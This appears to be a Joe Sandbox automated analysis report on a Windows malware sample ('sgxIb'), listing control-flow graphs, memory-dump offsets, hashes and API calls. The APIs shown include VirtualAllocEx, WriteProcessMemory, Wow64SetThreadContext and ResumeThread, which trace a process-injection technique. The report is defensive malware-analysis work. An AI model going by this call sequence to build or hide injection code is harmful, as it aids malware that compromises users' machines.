                                                                                                                    • Opcode Fuzzy Hash: dd9cd19f9dcde847c319064700195215eb5ad04304bdb4e6567a6e044452cf23
                                                                                                                    • Instruction Fuzzy Hash: B6916DB1D0021ADFDF24DF68C845BDEBBB2BF44314F1485AAD809A7280DB759985CF92

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 920 2a2ad68-2a2ad77 921 2a2ada3-2a2ada7 920->921 922 2a2ad79-2a2ad86 call 2a2a08c 920->922 924 2a2adbb-2a2adfc 921->924 925 2a2ada9-2a2adb3 921->925 929 2a2ad88 922->929 930 2a2ad9c 922->930 931 2a2ae09-2a2ae17 924->931 932 2a2adfe-2a2ae06 924->932 925->924 975 2a2ad8e call 2a2aff0 929->975 976 2a2ad8e call 2a2b000 929->976 930->921 933 2a2ae3b-2a2ae3d 931->933 934 2a2ae19-2a2ae1e 931->934 932->931 939 2a2ae40-2a2ae47 933->939 936 2a2ae20-2a2ae27 call 2a2a098 934->936 937 2a2ae29 934->937 935 2a2ad94-2a2ad96 935->930 938 2a2aed8-2a2afcb GetModuleHandleW 935->938 943 2a2ae2b-2a2ae39 936->943 937->943 972 2a2afd4-2a2afe8 938->972 973 2a2afcd-2a2afd3 938->973 940 2a2ae54-2a2ae5b 939->940 941 2a2ae49-2a2ae51 939->941 944 2a2ae68-2a2ae71 call 2a2a0a8 940->944 945 2a2ae5d-2a2ae65 940->945 941->940 943->939 951 2a2ae73-2a2ae7b 944->951 952 2a2ae7e-2a2ae83 944->952 945->944 951->952 953 2a2aea1-2a2aea5 952->953 954 2a2ae85-2a2ae8c 952->954 957 2a2aeab-2a2aeae 953->957 954->953 956 2a2ae8e-2a2ae9e call 2a2a0b8 call 2a2a0c8 954->956 956->953 960 2a2aeb0-2a2aece 957->960 961 2a2aed1-2a2aed7 957->961 960->961 973->972 975->935 976->935
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 26cadf529516ecfbd20110d845cdeb56171c272f6d20126fb13c392fac79bb5c
                                                                                                                    • Instruction ID: 9c3be13e3cd0991bd118732e0ea35fd021c283e56c4c419ebc898f6d44be9558
                                                                                                                    • Opcode Fuzzy Hash: 26cadf529516ecfbd20110d845cdeb56171c272f6d20126fb13c392fac79bb5c
                                                                                                                    • Instruction Fuzzy Hash: 85712470A00B258FD724DF29D19475ABBF2BF48304F108A2DD48AC7A52DB75E94ACF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 977 2a258ed-2a258f4 978 2a25891-2a258b9 977->978 979 2a258f6-2a259b9 CreateActCtxA 977->979 982 2a258c2-2a258e3 978->982 983 2a258bb-2a258c1 978->983 984 2a259c2-2a25a1c 979->984 985 2a259bb-2a259c1 979->985 983->982 993 2a25a2b-2a25a2f 984->993 994 2a25a1e-2a25a21 984->994 985->984 995 2a25a40 993->995 996 2a25a31-2a25a3d 993->996 994->993 998 2a25a41 995->998 996->995 998->998
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 02A259A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 6c8ea2d85e2aedab019a4456865c6cc5924aab5b505a3ac19d87a4e3a1eaace8
                                                                                                                    • Instruction ID: 7930b05eb39268e68f8cdf1a391f14e790e9dc0c0fa88223ea3c126a8e672e9f
                                                                                                                    • Opcode Fuzzy Hash: 6c8ea2d85e2aedab019a4456865c6cc5924aab5b505a3ac19d87a4e3a1eaace8
                                                                                                                    • Instruction Fuzzy Hash: DF51F3B1D00719CEDB28DFA9C8887DEBBF1BF49314F20806AD409AB251DB75A949CF51

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 999 2a244b0-2a259b9 CreateActCtxA 1002 2a259c2-2a25a1c 999->1002 1003 2a259bb-2a259c1 999->1003 1010 2a25a2b-2a25a2f 1002->1010 1011 2a25a1e-2a25a21 1002->1011 1003->1002 1012 2a25a40 1010->1012 1013 2a25a31-2a25a3d 1010->1013 1011->1010 1015 2a25a41 1012->1015 1013->1012 1015->1015
                                                                                                                    APIs
                                                                                                                    • CreateActCtxA.KERNEL32(?), ref: 02A259A9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Create
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2289755597-0
                                                                                                                    • Opcode ID: 07ecf68bad908429de8a6e0c7b4da3fbefa45abe22349e47e4ae3471ddd83365
                                                                                                                    • Instruction ID: a2be1a6c1ac628740b9c50db48fcb44075edb5d2a60db938e6a52e2bfefec7d0
                                                                                                                    • Opcode Fuzzy Hash: 07ecf68bad908429de8a6e0c7b4da3fbefa45abe22349e47e4ae3471ddd83365
                                                                                                                    • Instruction Fuzzy Hash: 3341E4B0D0072DCBDB28DFA9C884B9DBBF5BF49314F60806AD409AB251DB716949CF91

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1016 5154040-515407c 1018 5154082-5154087 1016->1018 1019 515412c-515414c 1016->1019 1020 5154089-51540c0 1018->1020 1021 51540da-5154112 CallWindowProcW 1018->1021 1025 515414f-515415c 1019->1025 1027 51540c2-51540c8 1020->1027 1028 51540c9-51540d8 1020->1028 1023 5154114-515411a 1021->1023 1024 515411b-515412a 1021->1024 1023->1024 1024->1025 1027->1028 1028->1025
                                                                                                                    APIs
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 05154101
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1999256332.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5150000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallProcWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2714655100-0
                                                                                                                    • Opcode ID: a74e8179fb71f5f91251838ccf213122bd65256b38e717c71e9e83585f041711
                                                                                                                    • Instruction ID: b862f64493c5078b3abaa42ebdc9c25ad9a8988a03fc89ec15b4d8b16a8b2fb5
                                                                                                                    • Opcode Fuzzy Hash: a74e8179fb71f5f91251838ccf213122bd65256b38e717c71e9e83585f041711
                                                                                                                    • Instruction Fuzzy Hash: D8410AB4900305CFCB14CF99C889AAAFBF5FB88324F258459D919A7321D775A945CFA0

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1031 754ec80-754ecce 1033 754ecd0-754ecdc 1031->1033 1034 754ecde-754ed1d WriteProcessMemory 1031->1034 1033->1034 1036 754ed26-754ed56 1034->1036 1037 754ed1f-754ed25 1034->1037 1037->1036
                                                                                                                    APIs
                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0754ED10
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3559483778-0
                                                                                                                    • Opcode ID: 59af981799c444d96a723f6383dbea40cef7cb25065ab7b48646cf6c07f44bf8
                                                                                                                    • Instruction ID: 89aec8591e632258fe381ffcc3ea45c1295f16bb26888e839f29ba8d40050708
                                                                                                                    • Opcode Fuzzy Hash: 59af981799c444d96a723f6383dbea40cef7cb25065ab7b48646cf6c07f44bf8
                                                                                                                    • Instruction Fuzzy Hash: 5B2125B19003499FCF10DFAAC885BDEBBF5FF48314F10842AE919A7240C778A954DBA4

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1041 2a2d23c-2a2d6e4 DuplicateHandle 1043 2a2d6e6-2a2d6ec 1041->1043 1044 2a2d6ed-2a2d70a 1041->1044 1043->1044
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A2D616,?,?,?,?,?), ref: 02A2D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 408c3816e8925518fe6cea89899b66c87b7b15baf046dc06c1212bf280e4c032
                                                                                                                    • Instruction ID: f1ec2c2ef42fad6706f8478185f58ba90f9c48dbdc266a1c68869bd72165f72d
                                                                                                                    • Opcode Fuzzy Hash: 408c3816e8925518fe6cea89899b66c87b7b15baf046dc06c1212bf280e4c032
                                                                                                                    • Instruction Fuzzy Hash: 522114B59003489FDB10CF9AD984AEEFBF8EB48320F10841AE918A3311C374A944CFA5
                                                                                                                    APIs
                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0754EDF0
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1726664587-0
                                                                                                                    • Opcode ID: 0853381f26c98644a4a8cd342ccb7556a2190c99306bbef1a214c6045236f09e
                                                                                                                    • Instruction ID: 8b213249ab1507588d5865a901cbe0ed2761146e289970fc549708a3331c2374
                                                                                                                    • Opcode Fuzzy Hash: 0853381f26c98644a4a8cd342ccb7556a2190c99306bbef1a214c6045236f09e
                                                                                                                    • Instruction Fuzzy Hash: DE2125B18003599FCB10DFAAC885AEEFBF5FF48320F10842EE519A7250C7389954DBA5

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1047 754eae8-754eb33 1049 754eb35-754eb41 1047->1049 1050 754eb43-754eb73 Wow64SetThreadContext 1047->1050 1049->1050 1052 754eb75-754eb7b 1050->1052 1053 754eb7c-754ebac 1050->1053 1052->1053
                                                                                                                    APIs
                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0754EB66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 983334009-0
                                                                                                                    • Opcode ID: 36e228f407549686ea17cc9840845b282e79a965d1087c8df369d0c111fe5cbe
                                                                                                                    • Instruction ID: ad9963af5bdf71b00e8db3ac5fd364ad2b69311bee8442829579b382f339d184
                                                                                                                    • Opcode Fuzzy Hash: 36e228f407549686ea17cc9840845b282e79a965d1087c8df369d0c111fe5cbe
                                                                                                                    • Instruction Fuzzy Hash: B02137B19003098FDB10DFAAC485BEEBBF4FF88324F14842AD559A7241CB789944CFA5
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A2D616,?,?,?,?,?), ref: 02A2D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 71925190f60cfb4f736d245fbf1816110d9474f3278c021dc99bb14dfe1b347c
                                                                                                                    • Instruction ID: 4d9fd37b26b3d38e23cc0de5521924e6f5a0e7f4206b87729bb8bdd880dfa035
                                                                                                                    • Opcode Fuzzy Hash: 71925190f60cfb4f736d245fbf1816110d9474f3278c021dc99bb14dfe1b347c
                                                                                                                    • Instruction Fuzzy Hash: D021EFB59002089FDB10CFAAD984AEEBBF4EB48320F14841AE918A3351C378A944CF60
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075427EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 97e1f60465f6f3c5d364725f13ae79f43b6851ce028c707e49d2191ac2b8e356
                                                                                                                    • Instruction ID: 7e603105b14df475a0b0fd3da773718d5c2587b4432039d4535f4524408f95c1
                                                                                                                    • Opcode Fuzzy Hash: 97e1f60465f6f3c5d364725f13ae79f43b6851ce028c707e49d2191ac2b8e356
                                                                                                                    • Instruction Fuzzy Hash: BE21F4B59002499FCB10DF9AC885ADEFBF4FB48320F10842AE868A3251D374A944CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075427EB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 0823c7f3401f4ff8917c1df58487d5503949efd6b38a9c6005048d544f7299ba
                                                                                                                    • Instruction ID: 577e6eb5ef09a5def6e04b05559c29b0122afe64dc294f612d7b802e7f8e9f09
                                                                                                                    • Opcode Fuzzy Hash: 0823c7f3401f4ff8917c1df58487d5503949efd6b38a9c6005048d544f7299ba
                                                                                                                    • Instruction Fuzzy Hash: 7721E7B59003599FCB10DF9AC884BDEFBF4FB48320F108429E958A7251D374A544CFA1
                                                                                                                    APIs
                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0754EC2E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 74bd374a398bae21614742445815467dd420b72eb1649e86d6fe7d203fde36cc
                                                                                                                    • Instruction ID: fdc4ec1f32038e31dc0770c7926666f8dfee84e3683f0705d5b382f853a16f31
                                                                                                                    • Opcode Fuzzy Hash: 74bd374a398bae21614742445815467dd420b72eb1649e86d6fe7d203fde36cc
                                                                                                                    • Instruction Fuzzy Hash: 7A1156B18002499FCB20DFAAC845ADEBBF5FF88324F208819E519A7250C735A940CBA1
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ResumeThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 947044025-0
                                                                                                                    • Opcode ID: eff9ecfd09bad5dd1f6d4ac8b58c6bbcc7378b3843a8201e15980c4436f1f6ef
                                                                                                                    • Instruction ID: 6d97986fd2755a31e8c7fdfd4a8a20299dd238cdffa86feae831472cece3891e
                                                                                                                    • Opcode Fuzzy Hash: eff9ecfd09bad5dd1f6d4ac8b58c6bbcc7378b3843a8201e15980c4436f1f6ef
                                                                                                                    • Instruction Fuzzy Hash: 391136B19003498FCB24DFAAC4497DEFBF5FF88324F20881AD519A7240CB75A944CBA5
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: 56f842510a89a24dfa775aadc3b18379ef952f8800cf5fd8f09cddc036accab7
                                                                                                                    • Instruction ID: 51362e0dba7e8462979878944f7f5ebec566c0f20cae6059b2ad5d70e7f0db39
                                                                                                                    • Opcode Fuzzy Hash: 56f842510a89a24dfa775aadc3b18379ef952f8800cf5fd8f09cddc036accab7
                                                                                                                    • Instruction Fuzzy Hash: 901110B6C003498FCB14CF9AC444ADEFBF4EF88324F10845AD429A7611C779A549CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09131505
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2004898624.0000000009130000.00000040.00000800.00020000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_9130000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: c7086fff13238640eaee79437c9d21367d24588f4835cbe9593e997835fa227c
                                                                                                                    • Instruction ID: 3c278e9201e9ed506860e831f3dba27188805f10b1b4009ddaea257b8bd4b6fe
                                                                                                                    • Opcode Fuzzy Hash: c7086fff13238640eaee79437c9d21367d24588f4835cbe9593e997835fa227c
                                                                                                                    • Instruction Fuzzy Hash: CD1100B59003489FCB10DF9AC889BDEBBF8EB49324F10881AE519A7710C375A944CFA1
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02A2AFBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4139908857-0
                                                                                                                    • Opcode ID: c8085c530b7cf6ba6d96f79a5f75a6f00c83f3ce8ab24f2ddd19382652d2ae73
                                                                                                                    • Instruction ID: f7811a2eead3143a8f004d24b9f1f5582afc3051ca453da00ea5bd64b30c6963
                                                                                                                    • Opcode Fuzzy Hash: c8085c530b7cf6ba6d96f79a5f75a6f00c83f3ce8ab24f2ddd19382652d2ae73
                                                                                                                    • Instruction Fuzzy Hash: 5D110CB6C002498ECB14CF9AC548ADEFBF4AF88324F10845AD429B7611C378A549CFA1
                                                                                                                    APIs
                                                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 09131505
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2004898624.0000000009130000.00000040.00000800.00020000.00000000.sdmp, Offset: 09130000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_9130000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 410705778-0
                                                                                                                    • Opcode ID: 745f482b3802e20687bbc10e97d4126033ead2095b918690737a4ae25531bdf0
                                                                                                                    • Instruction ID: 937c0a4ef469b843408b7d9f430735a1f63063f63e9ddef605ec82cb7765b7e2
                                                                                                                    • Opcode Fuzzy Hash: 745f482b3802e20687bbc10e97d4126033ead2095b918690737a4ae25531bdf0
                                                                                                                    • Instruction Fuzzy Hash: 8E1112B58003489FCB10DF9AC889BDEFBF8EB49324F10841AE519A7610C375A944CFA1
                                                                                                                    APIs
                                                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02A2D616,?,?,?,?,?), ref: 02A2D6D7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1994847220.0000000002A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A20000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_2a20000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DuplicateHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3793708945-0
                                                                                                                    • Opcode ID: 24ab53cceb3fb0d47ffa9a526be557d484ba76eade4e6c58784a8cb73e14cae0
                                                                                                                    • Instruction ID: 17a78b3b8c5bcf0885a009dcc144140c6ba90b6c570a2c5003c55ca4dbb917cf
                                                                                                                    • Opcode Fuzzy Hash: 24ab53cceb3fb0d47ffa9a526be557d484ba76eade4e6c58784a8cb73e14cae0
                                                                                                                    • Instruction Fuzzy Hash: C511A9B190024ADFDB10CFADD888BDEBFF0EF49324F24810AE528A7251C374A855DB61
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993495101.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fad000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dec8d05ffcc41757e7117169ed367a592ca9d8cdee9e9a707073185b846a164e
                                                                                                                    • Instruction ID: 4ea81e0491b8a1d8ae55118c7574bb7040e9ad9fde3a3e01f588259ce677376e
                                                                                                                    • Opcode Fuzzy Hash: dec8d05ffcc41757e7117169ed367a592ca9d8cdee9e9a707073185b846a164e
                                                                                                                    • Instruction Fuzzy Hash: 3E213AF6D04240DFCB05DF14D9C4B26BF65FB99328F28C569E80A0B656C336D816E7A1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993563419.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fbd000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86af3302baed8d2e47e6649dee3c5234f8170413fd44c0faa2c9e62350e999d8
                                                                                                                    • Instruction ID: 4869c42bf62215bc5721944723136f9ae523fa5f2d0c907a482eb35927ba9d36
                                                                                                                    • Opcode Fuzzy Hash: 86af3302baed8d2e47e6649dee3c5234f8170413fd44c0faa2c9e62350e999d8
                                                                                                                    • Instruction Fuzzy Hash: 0721F575A04200DFCB14EF14D9C4B56BBA5FB94364F24C56DD80A4B38AD33AD807EE62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993563419.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fbd000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0081fe4ce4aed218909bbad9461555afa3e50f747ba003275942b4cb2faa84b
                                                                                                                    • Instruction ID: 593bee19fa25d0ea51a9532a4de5d9eb178736ca92f156d1b3f24a7d4027a2a8
                                                                                                                    • Opcode Fuzzy Hash: a0081fe4ce4aed218909bbad9461555afa3e50f747ba003275942b4cb2faa84b
                                                                                                                    • Instruction Fuzzy Hash: C1213771A04240EFDB05DF15C9C0B25BBA5FB84324F20C66DD80A4B381D336D806DF62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993563419.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fbd000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 944f0b1a12f761938fb1ad49abb5f1fe45784c25ea9347fdfd3aed8229445484
                                                                                                                    • Instruction ID: 5444bdf271eaca584496de8d1e8254a82ae86b56f1e20b6f2df2782089cc9ce1
                                                                                                                    • Opcode Fuzzy Hash: 944f0b1a12f761938fb1ad49abb5f1fe45784c25ea9347fdfd3aed8229445484
                                                                                                                    • Instruction Fuzzy Hash: B42192755093C08FCB02DF24D994715BF71EB46324F28C5EAD8498F6A7C33A980ADB62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993495101.0000000000FAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FAD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fad000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction ID: dd97a76fb78ce6d92bff4f323f7ab99d3570de25ffde88a6f296d16a631f8fd4
                                                                                                                    • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                                                                    • Instruction Fuzzy Hash: 0311E9B6D04240CFCB15CF14D5C4B16BF71FB94324F28C5A9D8460B656C336D856DB91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.1993563419.0000000000FBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FBD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_fbd000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction ID: 52aeb2219ef2aa56309b3e3b392c4e77ea3b5b38b76651a3314d2c9df092c81a
                                                                                                                    • Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                                                                    • Instruction Fuzzy Hash: 0C11BB75904280DFCB06CF10C9C4B15BBB2FB84324F24C6ADD8494B296C33AD80ADF62

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:9%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:204
                                                                                                                    Total number of Limit Nodes:22
